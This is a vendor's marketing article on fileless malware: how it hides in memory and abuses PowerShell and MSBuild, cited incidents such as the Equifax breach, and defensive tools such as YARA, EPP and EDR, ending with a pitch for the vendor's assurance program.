Exposing Fileless Malware
After creating a formula that makes him imperceptible to the human eye, the title character in H.G. Wells’ 1897novel “The Invisible Man” makes plans to use his condition to launch a reign of terror. Today, malware authors are giving that plot an update for the digital age with a particularly menacing type of software.
Fileless malware displays none of the usual indicators of an attack, making it practically invisible to traditional signature-based antivirus and antimalware tools. That’s why analysts claim these attacks are 10 times more likely to succeed than file-based attacks.
Fileless attacks grew by nearly 900percent in 2020, according to research from WatchGuard Technologies’ ThreatLab. Researchers say this surge is directly related to the mass transition to remote work in response to the pandemic. A high percentage of fileless attacks target remote workers using unsecured endpoint devices such as PCs, laptops, tablets and smartphones.
Like viruses, spyware, ransomware and other threats, fileless malware typically infiltrates systems through phishing emails, malicious downloads or infected links. After that, however, it exhibits very different behaviors.
Under the Radar
Instead of piggybacking on an infected file, fileless malware injects malicious code into legitimate programs that have already been installed on targeted systems. The code is never stored in a file or installed on the infected machine — it simply loads directly into the computer’s memory or registry.
Once executed, the code commonly exploits legitimate scripting frameworks such as PowerShell to spread laterally through the network, infecting multiple machines. It performs reconnaissance, collects sensitive information, and then disappears without a trace when the infected computer is rebooted.
The 2017 Equifax breach is perhaps the most notable example of a fileless attack. The malware exploited a command injection vulnerability to access dozens of the credit bureau’s web servers. It remained undetected for more than two months, ultimately harvesting the personal information of more than 160 million consumers.
More recently, researchers discovered that malicious actors have been using a free Microsoft software development application called MSBuild to infiltrate companies and deploy remote access tools (RATs) on computers. Once installed, the RATs execute code in memory to steal passwords, disable security tools and take full control of the machines.
Detection and Prevention
Although these attacks are quite sophisticated, there are steps you can take to limit your risk. Content-filtering solutions can help block the initial infection by scanning web applications, email and text messages to identify malware signatures. If fileless malware does infiltrate a system, antimalware solutions that use heuristics and behavior-based techniques can often detect them in the early stages of an attack.
An open-source pattern-matching tool called YARA has also been effective in identifying fileless malware. YARA has a rules library that contains characteristics and indicators of nearly 2,000malware families. Users can simply search across their IT infrastructure for patterns that match any of those rules.
Endpoint protection (EPP) solutions can help detect and block threats at the device level. These integrated solutions typically include antivirus, antimalware, data encryption, personal firewalls, intrusion prevention and data loss prevention. Additionally, more organizations are implementing endpoint defense and response (EDR) solutions that use machine learning and continuous monitoring to identify stealthy threats that lack the usual clues and artifacts of an infection. These tools “learn” what malicious files look like based on a variety of traits.
Unlike the character in Wells’ story, fileless malware is no fantasy. As these insidious attacks become increasingly frequent, organizations must develop a new approach to malware prevention. Through our SSD Assurance program, we can deliver the services and solutions needed to expose and prevent these threats.